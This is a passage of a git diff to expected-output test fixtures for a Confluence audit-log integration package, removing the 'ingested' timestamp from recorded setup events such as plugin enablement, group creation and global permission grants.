added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15541,7 +15372,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837618428Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.243Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15626,7 +15456,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837619391Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.241Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15711,7 +15540,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837620266Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.239Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15796,7 +15624,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837621150Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.217Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15869,7 +15696,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:46:29.837622041Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.201Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -15945,7 +15771,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:46:29.837622923Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.188Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -16111,7 +15936,6 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-24T00:46:29.837623917Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.109Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"action\":\"User directory created\"},\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"key\":\"Encryption type\",\"i18nKey\":\"Encryption type\",\"to\":\"atlassian-security\"},{\"key\":\"ID\",\"i18nKey\":\"ID\",\"to\":\"327681\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"INTERNAL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16177,7 +16001,6 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-24T00:46:29.837624794Z", "original": "{\"timestamp\":\"2021-11-23T00:34:46.735Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16241,7 +16064,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:46:29.837625662Z", "original": "{\"timestamp\":\"2021-11-23T00:34:45.732Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16305,7 +16127,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:46:29.837626528Z", "original": "{\"timestamp\":\"2021-11-23T00:34:44.466Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16372,7 +16193,6 @@ }, "event": { "action": "audit.logging.summary.user.renamed", - "ingested": "2021-12-24T00:46:29.837627836Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.142Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"audit.logging.changed.value.username\",\"from\":\"asdf\",\"to\":\"asdf123\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -16443,7 +16263,6 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-24T00:46:29.837628821Z", "original": "{\"timestamp\":\"2021-11-28T17:06:11.805Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -16521,7 +16340,6 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-24T00:46:29.837629689Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.158Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"from\":\"asdf\",\"to\":\"asdf asdfasdf\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 37a34c21b8e..6467ffd1297 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -53,7 +53,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:47:21.347838021Z", "original": "{\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624567,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -119,7 +118,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:47:21.347840979Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624565,\"nano\":791000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -186,7 +184,6 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-24T00:47:21.347841862Z", "original": "{\"affectedObjects\":[{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space import\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Import/Export\",\"categoryI18nKey\":\"audit.logging.category.import.export\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624569,\"nano\":660000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -344,7 +341,6 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-24T00:47:21.347842580Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"auditType\":{\"action\":\"User directory created\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"ID\",\"key\":\"ID\",\"to\":\"327681\"},{\"i18nKey\":\"Name\",\"key\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"},{\"i18nKey\":\"Encryption type\",\"key\":\"Encryption type\",\"to\":\"atlassian-security\"},{\"i18nKey\":\"Description\",\"key\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"INTERNAL\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":440000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -411,7 +407,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:47:21.347843346Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":536000000},\"version\":\"1.0\"}", "type": [ "group", @@ -488,7 +483,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:47:21.347844047Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":552000000},\"version\":\"1.0\"}", "type": [ "group", @@ -577,7 +571,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347844752Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":592000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -663,7 +656,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347845455Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":620000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -749,7 +741,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347846150Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":623000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -835,7 +826,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347846911Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":627000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -921,7 +911,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347847648Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":688000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1007,7 +996,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347848485Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":692000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1093,7 +1081,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347849210Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":694000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1179,7 +1166,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347849913Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission 